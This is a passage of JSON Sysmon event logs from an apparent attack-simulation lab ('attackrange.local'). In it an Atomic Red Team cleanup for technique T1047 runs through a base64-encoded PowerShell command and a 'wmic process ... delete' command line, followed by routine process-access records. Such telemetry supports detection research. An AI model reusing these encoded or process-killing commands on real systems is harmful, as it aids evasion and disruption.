WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.460","ProcessGuid":"{41C8662E-20D9-5F25-0000-0010E52F0900}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process where name='notepad.exe' delete &gt;nul 2&gt;&amp;1\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","ParentProcessId":"1052","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5760,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010E52F0900}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010E52F0900}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5761,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-0010E52F0900}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-0010E52F0900}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5762,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5763,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5764,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5765,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5766,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.456","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5767,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.456\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 